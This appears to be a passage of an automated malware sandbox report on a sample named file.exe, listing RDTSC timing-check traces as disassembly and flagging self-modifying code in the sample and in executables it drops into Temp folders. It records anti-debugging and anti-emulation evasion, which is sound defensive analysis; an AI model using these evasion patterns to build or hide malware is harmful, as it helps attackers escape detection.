Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0011D second address: 4A00146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 21EB99DDh 0x00000008 mov edx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e jmp 00007F625CDF2474h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00146 second address: 4A00162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00162 second address: 4A001FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F625CDF2471h 0x00000009 xor cl, 00000036h 0x0000000c jmp 00007F625CDF2471h 0x00000011 popfd 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a push ebx 0x0000001b pushfd 0x0000001c jmp 00007F625CDF2474h 0x00000021 or eax, 3EDB7E88h 0x00000027 jmp 00007F625CDF246Bh 0x0000002c popfd 0x0000002d pop esi 0x0000002e jmp 00007F625CDF2479h 0x00000033 popad 0x00000034 mov ebx, dword ptr [ebp+10h] 0x00000037 pushad 0x00000038 mov cl, FFh 0x0000003a mov edx, 01D3512Ch 0x0000003f popad 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F625CDF2477h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A001FD second address: 4A002B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F625CED05BFh 0x00000009 adc cx, 758Eh 0x0000000e jmp 00007F625CED05C9h 0x00000013 popfd 0x00000014 jmp 00007F625CED05C0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], esi 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F625CED05BEh 0x00000026 and al, 00000038h 0x00000029 jmp 00007F625CED05BBh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F625CED05C8h 0x00000035 jmp 00007F625CED05C5h 0x0000003a popfd 0x0000003b popad 0x0000003c mov esi, dword ptr [ebp+08h] 0x0000003f pushad 0x00000040 jmp 00007F625CED05BCh 0x00000045 mov ax, 64D1h 0x00000049 popad 0x0000004a xchg eax, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov edi, 42AF0B3Ch 0x00000053 push edi 0x00000054 pop ecx 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A002B5 second address: 4A0031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F625CDF246Ah 0x0000000b xor ecx, 4FED2258h 0x00000011 jmp 00007F625CDF246Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F625CDF246Fh 0x00000022 add ecx, 3BFB891Eh 0x00000028 jmp 00007F625CDF2479h 0x0000002d popfd 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F625CDF246Eh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0031C second address: 4A0033C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c mov al, 96h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ax, dx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0033C second address: 4A00377 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F625CDF2475h 0x00000008 sub cx, 3366h 0x0000000d jmp 00007F625CDF2471h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, cx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00377 second address: 4A00392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F625CED05C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00392 second address: 4A00396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00396 second address: 4A003CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F62CF3FE82Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F625CED05BDh 0x00000017 and ax, F4D6h 0x0000001c jmp 00007F625CED05C1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A003CD second address: 4A003F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F625CDF246Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A003F8 second address: 4A00434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, BD72h 0x00000007 mov edi, 59863EBEh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F62CF3FE7DAh 0x00000015 jmp 00007F625CED05C5h 0x0000001a mov edx, dword ptr [esi+44h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F625CED05BDh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00434 second address: 4A004D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F625CDF2473h 0x0000000b sbb ecx, 1677D97Eh 0x00000011 jmp 00007F625CDF2479h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a or edx, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e mov ebx, ecx 0x00000020 mov ecx, 13BE88BFh 0x00000025 popad 0x00000026 test edx, 61000000h 0x0000002c jmp 00007F625CDF2472h 0x00000031 jne 00007F62CF32065Ah 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov ax, dx 0x0000003d pushfd 0x0000003e jmp 00007F625CDF2479h 0x00000043 or esi, 70A267C6h 0x00000049 jmp 00007F625CDF2471h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004D3 second address: 4A004D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0746 second address: 49F07AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov eax, 00FED503h 0x00000010 push esi 0x00000011 pushfd 0x00000012 jmp 00007F625CDF246Fh 0x00000017 or ax, 1BAEh 0x0000001c jmp 00007F625CDF2479h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 mov al, F8h 0x00000028 movsx ebx, si 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F07AB second address: 49F07AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F07AF second address: 49F07B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F07B5 second address: 49F07FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cl, 1Ah 0x0000000e mov edi, 4135071Eh 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 jmp 00007F625CED05C5h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov si, di 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F07FA second address: 49F07FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F07FF second address: 49F0890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F625CED05C3h 0x00000011 and eax, 6E5601DEh 0x00000017 jmp 00007F625CED05C9h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F625CED05C0h 0x00000023 sbb cl, FFFFFFD8h 0x00000026 jmp 00007F625CED05BBh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F625CED05C6h 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 mov cl, 98h 0x00000037 mov ch, dl 0x00000039 popad 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F625CED05C0h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0890 second address: 49F08B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e mov cx, F647h 0x00000012 popad 0x00000013 mov esi, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov si, dx 0x0000001c mov si, di 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F08B6 second address: 49F08CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F08CE second address: 49F08D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F08D4 second address: 49F0999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F625CED05BBh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F625CED05C9h 0x0000000f sbb ah, FFFFFFF6h 0x00000012 jmp 00007F625CED05C1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test esi, esi 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F625CED05BCh 0x00000024 adc cl, 00000018h 0x00000027 jmp 00007F625CED05BBh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F625CED05C8h 0x00000033 sub al, 00000078h 0x00000036 jmp 00007F625CED05BBh 0x0000003b popfd 0x0000003c popad 0x0000003d je 00007F62CF405FE7h 0x00000043 jmp 00007F625CED05C6h 0x00000048 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F625CED05C7h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0999 second address: 49F09F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F625CDF246Fh 0x00000008 pushfd 0x00000009 jmp 00007F625CDF2478h 0x0000000e jmp 00007F625CDF2475h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ecx, esi 0x00000019 pushad 0x0000001a mov bh, al 0x0000001c mov bh, 3Bh 0x0000001e popad 0x0000001f je 00007F62CF327E24h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F09F1 second address: 49F09F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F09F5 second address: 49F09FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F09FB second address: 49F0A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0A01 second address: 49F0A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0A05 second address: 49F0A2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f pushad 0x00000010 mov ch, 80h 0x00000012 mov esi, ebx 0x00000014 popad 0x00000015 jne 00007F62CF405F52h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F625CED05BAh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0A2C second address: 49F0AC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 pushfd 0x00000011 jmp 00007F625CDF246Eh 0x00000016 add ah, FFFFFFE8h 0x00000019 jmp 00007F625CDF246Bh 0x0000001e popfd 0x0000001f popad 0x00000020 jmp 00007F625CDF2478h 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F625CDF2470h 0x0000002c push eax 0x0000002d pushad 0x0000002e mov bh, 81h 0x00000030 mov ebx, ecx 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 call 00007F625CDF2472h 0x0000003a movzx ecx, bx 0x0000003d pop edi 0x0000003e call 00007F625CDF246Ch 0x00000043 push ecx 0x00000044 pop edx 0x00000045 pop esi 0x00000046 popad 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0AC1 second address: 49F0AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0AC5 second address: 49F0AD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0B96 second address: 49F0BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov bh, 42h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esp, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f movzx esi, bx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E3C second address: 4A00E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E42 second address: 4A00EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, dx 0x0000000e pushad 0x0000000f mov dx, B402h 0x00000013 jmp 00007F625CED05C3h 0x00000018 popad 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007F625CED05C6h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F625CED05C7h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00BFF second address: 4A00C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F625CDF246Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00C0F second address: 4A00C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop eax 0x0000000e movsx ebx, cx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00C21 second address: 4A00C5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F625CDF2476h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80774 second address: 4A80791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80791 second address: 4A80797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80797 second address: 4A807D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F625CED05BBh 0x00000014 call 00007F625CED05C8h 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A807D9 second address: 4A8084A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F625CDF246Eh 0x00000009 adc si, F2B8h 0x0000000e jmp 00007F625CDF246Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F625CDF2478h 0x0000001a xor esi, 63712D18h 0x00000020 jmp 00007F625CDF246Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a jmp 00007F625CDF2479h 0x0000002f xchg eax, ebp 0x00000030 pushad 0x00000031 mov al, C0h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A708CD second address: 4A708D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A708D1 second address: 4A708D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A101CE second address: 4A101EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A101EB second address: 4A10207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10207 second address: 4A10221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10221 second address: 4A10239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ax, BCCBh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10239 second address: 4A10247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10247 second address: 4A1024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A1024B second address: 4A10260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10260 second address: 4A10272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10272 second address: 4A10282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70AA7 second address: 4A70AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70AAB second address: 4A70AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70AAF second address: 4A70AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70AB5 second address: 4A70B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F625CED05C0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F625CED05BDh 0x0000001c add cx, E176h 0x00000021 jmp 00007F625CED05C1h 0x00000026 popfd 0x00000027 movzx esi, bx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70B10 second address: 4A70B39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F625CDF2470h 0x00000011 push dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70B39 second address: 4A70B79 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push 74C18B68h 0x0000000c pushad 0x0000000d call 00007F625CED05BAh 0x00000012 jmp 00007F625CED05C2h 0x00000017 pop esi 0x00000018 popad 0x00000019 xor dword ptr [esp], 74C08B6Ah 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F625CED05BCh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70B79 second address: 4A70B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70B7F second address: 4A70B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 2C3598 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 333609 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 8B3598 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 923609 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Special instruction interceptor: First address: B34E3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Special instruction interceptor: First address: B32382 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Special instruction interceptor: First address: CFFD7D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Special instruction interceptor: First address: CD8E11 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Special instruction interceptor: First address: CDF9E7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Special instruction interceptor: First address: D62B9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: DCA46 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: DC947 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: DA1A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 294932 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Special instruction interceptor: First address: 3075C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Special instruction interceptor: First address: 9AF9D1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Special instruction interceptor: First address: 9AFA9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Special instruction interceptor: First address: B5144C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Special instruction interceptor: First address: B4FD08 instructions caused by: Self-modifying code
